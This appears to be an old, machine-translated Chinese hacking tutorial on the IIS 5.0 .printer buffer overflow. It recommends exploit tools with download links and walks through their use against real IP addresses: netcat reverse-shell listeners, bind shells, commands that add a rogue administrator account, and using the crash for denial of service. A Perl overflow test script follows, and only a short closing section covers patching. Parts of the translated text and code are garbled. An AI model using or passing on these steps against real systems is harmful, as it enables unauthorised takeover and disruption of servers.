Examples of Domestic. Printer remote overflow attack software
1. Xiao Rong's iis5exploit
Strictly speaking, this software is not written by Xiao Rong. It is optimized by Xiao Rong according to Jill. C.
Code compiled. However, this software is really good. We recommend that you use it.
Http://www.netxeyes.com/IIS5Exploit.zip
The compressed package contains three files: iis5exploit.exe?nc.exe=readme.txt
Iis5. printer exploit instructions
---------------The following is the content of readme.txt.
This program applies to the English version of IIS 5.0
1. First, open a listening port in the NC of the machine.
C:/> nc-l-P 99
2. Run iis5exploit
D:/> Jill XXX. XXX 211.152.188.1 333
============ Iis5 English version. printer exploit. ==============
=== Written by assassin 1995-2001. http://www.netXeyes.com ====
Connecting 211.152.188.1... OK.
Send shell code... OK
Iis5 shell code send OK
211.152.188.1 points to the local IP address.
Wait for a moment. If the port listening on the local NC is successful:
C:/> nc-l-P 99
Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:/>
You can execute commands. For example:
C:/> net user hack password/Add
The command completed successfully.
C:/> net localgroup administrartors hack/Add
In this way, a user hack belonging to the Administrator group is created, and the password is password.
-----------------------------------------------------------------
Instructions:
Using this software actually requires two MS-DOS windows, first running nc-l-P 99 can of course
To define a port as another one, we recommend that you increase the opened port to avoid testing with others.
Scanning your port affects your normal testing. Xiao Rong may be very anxious to write and run this description.
The iis5exploit operation is not completed yet. Which of the following statements is true?
Iis5exploit IP address of the target host attacker 99 (must be consistent with the port opened by your NC)
To achieve a high attack success rate, you must first specify that the target host to be attacked must be enabled.
HTTP/HTTPS service Win2k. We can telnet port 80 of the target host to get index.htm.
To determine if the other Win2k version is Microsoft Windows 2000 [version 5.00.2195].
You can also use the scanprinter provided by eyas to scan and obtain the data.
2. iis5hack provided by sunx.org
Http://www.sunx.org/mysoft/iis5hack.zip
Running Parameters
Iis5hack <Target Host IP address> <Web port 80>
Chinese Win2k: 0
Chinese Win2k SP1: 1
Win2k: 2
Win2k, SP1: 3
Japanese Win2k: 4
Japanese Win2k, SP1: 5
E:/hack/print> iis5hack 63.110.130.66 80 3
Iis5 remote. Printer overflow. writen by sunx
Http://www.sunx.org
For test only, dont used to hack,
Connecting...
Sending...
Now you can telnet to 99 Port
Good luck
C:/telnet 63.110.130.66 99
Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:/winnt/system32>
You have already entered the target host. What do you want to do is yours. The software has the advantage
The Windows 2 K system has a disadvantage. After the overflow succeeds, the IIS service of the target host stops and
After shell, you need to complete what you want to do in a short period of time. If it takes a long time, both shell and IIS will die.
Drop; the shell port of the target host cannot be defined at will.
When you exit the telnet service, remember to exit normally. Otherwise, IIS on the target host will also die.
During the test, I found that the IIS of the other party only died in two or three minutes.
It is also good to use the software as a Denial-of-Service attack.
3. cniis and iisx provided by isno.yeah.net
Isno's latest. Printer vulnerability attack software is iisx, which is an upgraded version of cniis.
We can see the following instructions:
Usage: iisx <target host> <SP> <-p |-A |-r attackhost attackport>
SP: 0 --- the target has not installed sp, 1 --- the target has installed SP1
Three attack methods are provided for the iis5. Printer vulnerability:
-P --- run iisx 66.77.88.99 0-P on the target
Open a port 7788 on 66.77.88.99 and telnet 66.77.88.99 7788 directly.
-A --- run iisx 66.77.88.99 0-A on the target
Add an Administrator Account: Hax on 66.77.88.99, whose password is also Hax,
You can use net use // 66.77.88.99/IPC $ "Hax"/User: "Hax" to establish a connection.
-R --- reverse join (similar to the Jill method). The specific implementation method is as follows:
For example, run nc-VV-l-P 5432 on 111.222.333.444,
Then run iisx 66.77.88.99 0-r 111.222.33.444 5432 on the target,
At this time, the connection from 66.77.88.99 will appear in 111.222.333.444.
---------------------------------
I didn't perform many tests on the software, but we can see that its first method and sunx's
Iis5hack is the same, but the customized telnet ports for overflow are different. For fixed overflow ports, I
I always think it is not so good. At least when you test, when others scan the same host, your behavior
It is easy to be discovered.
For the second method, only network administrators with poor security technologies can be attacked, because
If a Super User with the same password and user ID can succeed, the other user will be very damn, because
The Administrator cannot even set the length of the password in bytes or special characters, so the level can be imagined.
The third attack method is similar to Jill. C, so I will not introduce it in detail.
4. program testing for scanning. Printer Vulnerabilities
1. scanning program cgicheck compiled by eyas
Eyas, a good friend of mine, a very enterprising young man, is now working at a security company in China.
Work: after Microsoft's. Printer vulnerability announcement, I wrote a tool dedicated to scanning the vulnerability.
Scanprinter, due to the rush of time, the software can scan the vulnerability, but in the Custom scan thread
And the timeout delay is not well written and used.
I wanted to introduce his scanprinter. When I wrote this part, he gave me e to his new
Cgicheck is also a beta version of the doscommand tool. We can see from the file name that he typed
Write the software as a CGI vulnerability scanning tool similar to twwwscan.
Now let's take a look at the effect.
The following is a scan running on amd850 128 MB 64 kisdn win98se.
E:/> cgicheck 203.212.4.1 203.212.4.255 100 4
[203.212.4.18] Has. Printer mapped.
[203.212.4.19] Has. Printer mapped.
[203.212.4.227] Has. Printer mapped.
* ****** 100% wait 4 seconds to exit ********
[203.212.4.237] Has. Printer mapped.
[203.212.4.238] Has. Printer mapped.
All done.
Complete. Scan 254 targets use 15.8 seconds. Speed 16.1/s
According to the scan results, the software is indeed greatly improved. We recommend that you enable the software
You can customize the content to be scanned. After all, we do not need
Some CGI vulnerabilities are scanned (you need to know that some vulnerabilities are rarely seen, and the addition only delays the scanning Effect
Rate ).
2. pl Scanner
Let's look at one of the following scanning programs written in Perl:
#! /Usr/bin/perl
# Exploit by storm@stormdev.net
# Tested with sucess against Win2k IIS 5.0 + SP1
# Remote buffer overflow test for Internet Printing Protocol
# This code was written after eeye brought this issue in Bugtraq.
Use SOCKET;
Print "-- IPP-Microsoft IIS 5.0 vulnerability test by storm --/n ";
If (not $ argv [0]) {
Print QQ ~
Usage: webexplt. pl ~;
Exit ;}
$ IP = $ argv [0];
Print "sending exploit code to host:". $ IP. "/n ";
My @ Results = sendexplt ("Get/null. printer HTTP/1.0/N". "Host:
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/n ");
Print "results:/N ";
If (not @ results ){
Print "The Machine tested has the IPP vulnerability! ";
}
Print @ results;
Sub sendexplt {
My ($ pstr) = @_;
$ Target = inet_aton ($ IP) | die ("inet_aton problems ");
Socket (S, pf_inet, sock_stream, getprotobyname ('tcp ') | 0) |
Die ("socket problems/N ");
If (connect (S, pack "Snail 4x8", $ target )){
Select (s );
$ | = 1;
Print $ pstr;
My @ in = <S>;
Select (stdout );
Close (s );
Return @ in;
} Else {die ("can't connect.../N ");}
}
---------------------------------------------------------------
In fact, this scanner is a relatively simple PL scan, the command format is webexplt. pl IP
Only one IP address can be detected by sending get/null. printer HTTP/1.0/n
Request, and send a long string to the target host to detect whether the. Printer vulnerability exists.
3. Other scanning software, such as www.netguard.com.cn and www.xfocus.org
The easyscan and X-scaner versions released specifically scan printer vulnerabilities. You can
Try.
5. Elimination of Vulnerabilities
The best solution is security. Microsoft patches for this vulnerability:
Patch:
Http://www.microsoft.com/Downloads/...ReleaseID=29321
If you cannot obtain the patch, we can also manually set your server:
Set Control Panel Administrative Tools Internet service manager right-click your site
For example, I'm badboy-f5gzewyd, properties, edit www service, home directory, Configuration
Application configuration, find. printer, and clear
However, you will lose the network printing function.
It's better than being exploited to intrude into the system.